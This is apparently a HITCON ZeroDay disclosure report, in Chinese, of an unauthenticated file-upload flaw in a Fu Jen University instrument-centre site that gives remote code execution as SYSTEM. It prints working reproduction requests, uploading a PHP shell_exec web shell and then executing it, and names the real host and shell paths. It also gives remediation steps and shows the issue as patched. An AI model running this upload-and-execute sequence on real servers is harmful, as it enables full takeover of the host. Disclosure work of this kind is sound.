Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2026-00866
- Vendor: 輔仁大學學校財團法人輔仁大學
- Title: 輔仁大學貴重儀器中心未授權檔案上傳導致遠端程式碼執行(RCE / SYSTEM 權限)
- Introduction: 貴重儀器中心 /api/common/uploadFile 端點未經身分驗證即可上傳任意 .php 檔案並由伺服器執行,造成未授權 RCE,且程序權限為 nt authority\system。
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2026/06/23 10:36:33 : 新提交 (由 Ethan Yang 更新此狀態)
- 2026/06/25 16:41:55 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/07/23 15:56:02 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/07/23 15:56:02 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/07/23 15:56:02 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/07/29 14:14:01 : 已修補 (由 組織帳號 更新此狀態)
- 2026/08/06 03:00:08 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2026-00866
- 通報者:yangminchun (Ethan Yang)
- 風險:嚴重
- 類型:程式碼執行 (Code Execution)
參考資料
相關網址
https://fjuic.fju.edu.tw/uploads/file/202606/23/file_1782145938_TV3NSQ39W0.php
https://fjuic.fju.edu.tw/uploads/file/202606/23/file_1782182128_XEISEcuETn.php
敘述
摘要
POST /api/common/uploadFile 在無需任何身分驗證的情況下接受任意檔案上傳。上傳 .php 檔案會被伺服器直接執行
whoami 權限為 nt authority\system,構成未授權遠端程式碼執行 (RCE)。
重現步驟
步驟一:上傳
POST /api/common/uploadFile HTTP/2
Host: fjuic.fju.edu.tw
Content-Type: multipart/form-data
[email protected] (內容:<?php echo shell_exec("whoami"); ?>)
{
"result_code": 1,
"content": {
"path": "/uploads/file/202606/23/file_1782145938_TV3NSQ39W0.php",
"file_name": "file_1782145938_TV3NSQ39W0.php"
},
"http_code": 200
}
步驟二:執行
GET /uploads/file/202606/23/file_1782145938_TV3NSQ39W0.php HTTP/2
Host: fjuic.fju.edu.tw
回應: nt authority\system
已驗證
- 上傳與存取全程不需身分驗證、Session 或 CSRF token
- 無檔案類型限制,
.php被接受並以原副檔名儲存 - 上傳檔案位於可由外部直接存取的目錄 (
/uploads/file/YYYYMM/DD/) - 伺服器會執行上傳的 PHP 檔案
php_uname("s")回傳Windows NTwhoami回傳nt authority\system- 伺服器環境:nginx/1.26.3、PHP 8.2.28(
X-Powered-By)
影響
任意未授權攻擊者可在伺服器上以最高權限 (SYSTEM) 執行任意指令,等同完全控制該主機,可進一步竊取資料、植入後門,甚至架設後門入侵內網
殘留檔案需立即清除
測試用 PoC 檔案目前仍存放於:/uploads/file/202606/23/file_1782145938_TV3NSQ39W0.php
該檔案本身即為一個任何人皆可存取的入口,請於修補前優先刪除。
修補建議
1. 對上傳點加上身分驗證和授權檢查。
2. 採用副檔名與 MIME 白名單,僅允許必要的檔案類型
3. 將上傳目錄移出 web root;若無法移出,於 nginx 設定中停用該目錄的 PHP 執行(不將 .php 交給 PHP-FPM)。
4. 上傳檔案一律重新命名並移除可執行副檔名。
5. 降低 web 服務執行權限,勿以 SYSTEM 執行。
6. 立即刪除已上傳的測試檔案 file_1782145938_TV3NSQ39W0.php。